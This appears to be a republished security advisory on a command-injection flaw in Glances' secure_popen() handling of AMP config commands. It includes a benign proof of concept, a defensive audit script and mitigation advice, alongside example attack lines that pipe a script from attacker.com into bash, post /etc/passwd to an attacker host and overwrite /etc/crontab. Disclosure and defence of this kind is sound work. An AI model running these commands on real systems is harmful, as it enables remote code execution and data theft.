The `secure_popen()` function in `glances/secure.py` implements its own parser for shell-like operators (`>` for file redirection, `|` for piping, and `&&` for command chaining) by splitting the input string on these characters and executing each segment with `subprocess.Popen(shell=False)`. No validation is performed on the target file path, the piped command, or the chained command.
When Application Monitoring Process (AMP) modules load their `command` or `service_cmd` configuration values from glances.conf, those values are passed directly to `secure_popen()` without any sanitization. An attacker who can modify the Glances configuration file can therefore:
- Write arbitrary content to arbitrary filesystem paths via the `>` operator (e.g., overwriting `/etc/crontab` or `~/.ssh/authorized_keys`).
- Chain arbitrary commands via `&&` (e.g., `echo x && curl http://attacker.com/shell.sh | bash`).
- Pipe command output to arbitrary programs via `|`, enabling data exfiltration.
Crucially, the `--disable-config-exec` flag introduced for CVE-2026-33641 does not mitigate this issue. That flag only disables backtick command execution in `config.get_value()`; it has no effect on how `secure_popen()` interprets `>`, `|`, or `&&`. A command like `echo data > /etc/crontab` contains no backticks and passes through `get_value()` unchanged, after which `secure_popen()` writes to the arbitrary path.
Affected code paths:
- Default AMP (`glances/amps/default/__init__.py:69`): `res = self.get('command')` → `self.set_result(secure_popen(res).rstrip())`.
- SystemV AMP (`glances/amps/systemv/__init__.py:60`): `res = secure_popen(self.get('service_cmd'))`.
Both values are loaded via `GlancesAmp.load_config()` (`glances/amps/amp.py:81`).
The `secure_popen()` sink (`glances/secure.py:33-77`) explicitly splits on:
- `>` (line 39): the path after `>` is used directly in `open(stdout_redirect, "w")` (line 71) with no path validation.
- `|` (line 51): each segment is executed as a separate `Popen` with stdout piped to the next.
- `&&` (line 27): each segment is executed sequentially.
None of these operators are sanitized or restricted when loading AMP configuration values.
DailyCVE Form:
Platform: Glances
Version: <4.5.2
Vulnerability: Command Injection
Severity: High
Date: 2026-03-18
Prediction: 2026-03-14
What Undercode Say:
Analytics – The following PoC demonstrates the vulnerability in a clean environment. It loads a malicious `glances.conf` with the `--disable-config-exec` flag active (proving the flag does not help) and verifies arbitrary file write via the `>` operator.
1. Create a test configuration file (the AMP section is named `amp_poc`, matching the section the PoC script reads below):

```shell
cat > /tmp/poc-glances.conf << 'EOF'
[amp_poc]
enable=true
regex=.
refresh=3
command=echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp

[outputs]
cors_origins=
EOF
```
2. Run the AMP command execution path:

```python
import os
import sys

sys.path.insert(0, '/path/to/glances')
from glances.config import Config
from glances.secure import secure_popen

# Load config with --disable-config-exec ACTIVE (CVE-2026-33641 mitigation)
config = Config(config_dir='/tmp/poc-glances.conf', disable_config_exec=True)

# Read AMP command value (same as amp.py load_config)
command = config.get_value('amp_poc', 'command')
print(f'Command: {command!r}')

# Execute (same as amps/default/__init__.py line 69)
marker = '/tmp/cve-poc-marker-amp'
assert not os.path.exists(marker), 'Clean state required'
result = secure_popen(command)
print(f'Result: {result!r}')

# Verify arbitrary file write occurred
assert os.path.exists(marker), 'VULNERABILITY NOT CONFIRMED'
with open(marker) as f:
    content = f.read()
print(f'Written to {marker}: {content!r}')
assert 'POC_ARBITRARY_FILE_WRITE' in content

# Cleanup
os.remove(marker)
print('CONFIRMED: Arbitrary file write via secure_popen > in AMP command')
```
3. Cleanup:

```shell
rm -f /tmp/poc-glances.conf /tmp/cve-poc-marker-amp
```
Expected output:

```text
Command: 'echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp'
Result: 'POC_ARBITRARY_FILE_WRITE\n'
Written to /tmp/cve-poc-marker-amp: 'POC_ARBITRARY_FILE_WRITE\n'
CONFIRMED: Arbitrary file write via secure_popen > in AMP command
```
Negative control – The `--disable-config-exec` flag blocks backtick-based commands (e.g., ``command=`rm -rf /` ``) but does not block `echo data > /etc/crontab` because no backticks are present.
Exploit:
An attacker with write access to `glances.conf` (via a separate file‑write bug, misconfigured shared filesystem, container volume mount, or configuration management system) can:
1. Arbitrary file write – Set `command=echo malicious > /etc/crontab` to overwrite system cron jobs.
2. Command chaining – Set `command=echo x && curl http://attacker.com/shell.sh | bash` to download and execute a remote shell.
3. Data exfiltration – Set `command=cat /etc/passwd | curl -X POST --data-binary @- http://attacker.com/exfil` to send sensitive files to an attacker-controlled server.
Because Glances often runs with elevated privileges (e.g., as root), these actions can lead to full system compromise.
Protection:
- Upgrade to Glances version 4.5.2 or later.
- Remove file redirection support from `secure_popen()`: eliminate the `>` operator handling (lines 39-45 and 69-72) or restrict output paths to a safe, non-writable directory with path traversal protection.
- Sanitize AMP command values before passing them to `secure_popen()`. Apply the same sanitization used in `actions.py:_sanitize_mustache_dict()` to strip `&&`, `|`, `>>`, and `>` from AMP `command` and `service_cmd` config values.
- Replace `secure_popen()` with `subprocess.run(shell=False)` using explicit argument arrays; this avoids the risky operator-parsing logic entirely.
- Add a regression test that verifies AMP commands cannot contain file redirection or command chaining operators.
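The following is an added example, not Glances project code and not the advisory author's PoC. It puts the protection items above into one runnable script: it audits a constructed glances.conf for the operators that `secure_popen()` is described as splitting on, models the backtick-only coverage of `--disable-config-exec` to show why that check alone misses a `>` redirect (the negative control discussed earlier), and runs an approved AMP command through `subprocess.run(shell=False)` with an explicit argument array instead of operator parsing. The `[amp_<name>]` section layout, the function names `find_operators`, `backtick_only_check`, `audit_amp_config` and `run_amp_command`, and the sample configuration text are assumptions of this example.

```python
"""Added example (not Glances project code): audit AMP command values in a
glances.conf-style file for the shell-like operators that secure_popen()
interprets, and run an approved command with shell=False and explicit argv."""
from __future__ import annotations

import configparser
import shlex
import subprocess

# Operators the advisory says secure_popen() splits on, plus `>>` and the
# backtick form that --disable-config-exec already refuses. Longest first so
# `>>` and `&&` are reported whole rather than as `>` or `&`.
SHELL_OPERATORS = ("&&", ">>", "|", ">", "`")

# Config keys the AMP modules hand to secure_popen(). Assumed layout: one
# [amp_<name>] section per module, as in the PoC config above.
AMP_COMMAND_KEYS = ("command", "service_cmd")

# Constructed sample: one benign AMP, one using `>`, one using `&&` and `|`.
SAMPLE_CONF = """\
[amp_nginx]
enable=true
regex=nginx
refresh=60
command=systemctl status nginx

[amp_marker]
enable=true
regex=.
refresh=3
command=echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp

[amp_chain]
enable=true
regex=.
refresh=3
service_cmd=echo x && cat /etc/hostname | wc -c
"""


def find_operators(value: str) -> list[str]:
    """Return every shell-like operator in `value`, in order of appearance.
    An empty list means the value is a plain argv-style command."""
    found: list[str] = []
    i = 0
    while i < len(value):
        for op in SHELL_OPERATORS:
            if value.startswith(op, i):
                found.append(op)
                i += len(op)
                break
        else:
            i += 1
    return found


def backtick_only_check(value: str) -> bool:
    """Model of what --disable-config-exec covers as the advisory describes it:
    backtick substitution only. True means that flag would reject the value."""
    return "`" in value


def audit_amp_config(text: str) -> dict[str, list[str]]:
    """Parse glances.conf content and map 'section.key' to the operators found
    in each AMP command value; values without operators are not reported."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    findings: dict[str, list[str]] = {}
    for section in parser.sections():
        if not section.startswith("amp_"):
            continue
        for key in AMP_COMMAND_KEYS:
            if parser.has_option(section, key):
                ops = find_operators(parser.get(section, key))
                if ops:
                    findings[f"{section}.{key}"] = ops
    return findings


def run_amp_command(value: str, timeout: float = 10.0) -> str:
    """Replacement for the secure_popen() pattern: refuse any value carrying an
    operator, then run the remaining argv with shell=False, so neither a shell
    nor a hand-written parser ever interprets `>`, `|` or `&&`."""
    ops = find_operators(value)
    if ops:
        raise ValueError(f"AMP command contains shell operators {ops}: {value!r}")
    argv = shlex.split(value)
    if not argv:
        raise ValueError("empty AMP command")
    proc = subprocess.run(argv, capture_output=True, text=True,
                          timeout=timeout, check=False)
    return proc.stdout


if __name__ == "__main__":
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(SAMPLE_CONF)
    for name, ops in audit_amp_config(SAMPLE_CONF).items():
        section, key = name.split(".")
        value = parser.get(section, key)
        print(f"{name}: operators {ops}; caught by backtick-only check: "
              f"{backtick_only_check(value)}")
    print(run_amp_command("echo hello").rstrip())
```

`audit_amp_config` is the shape of the regression test the last protection item asks for: run it over the shipped and deployed configuration files and fail if the returned mapping is non-empty. `run_amp_command` deliberately refuses rather than strips operators, so a value such as `echo data > /etc/crontab` produces a loud configuration error instead of silently running `echo` with `>` and a path as extra arguments.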
Impact:
- Arbitrary file write – Overwrite critical system files (e.g., `/etc/crontab`, `/etc/passwd`, `~/.ssh/authorized_keys`).
- Arbitrary command execution – Run any system command with the privileges of the Glances process (often root).
- Data exfiltration – Pipe sensitive monitoring data or system files to external attackers.
- Privilege escalation – A low-privileged user who can modify the configuration can escalate to root if Glances runs as root.
- Bypass of existing mitigation – The `--disable-config-exec` flag (CVE-2026-33641) does not protect against this attack, as it only blocks backtick execution in `config.get_value()`.
Sources:
Reported By: github.com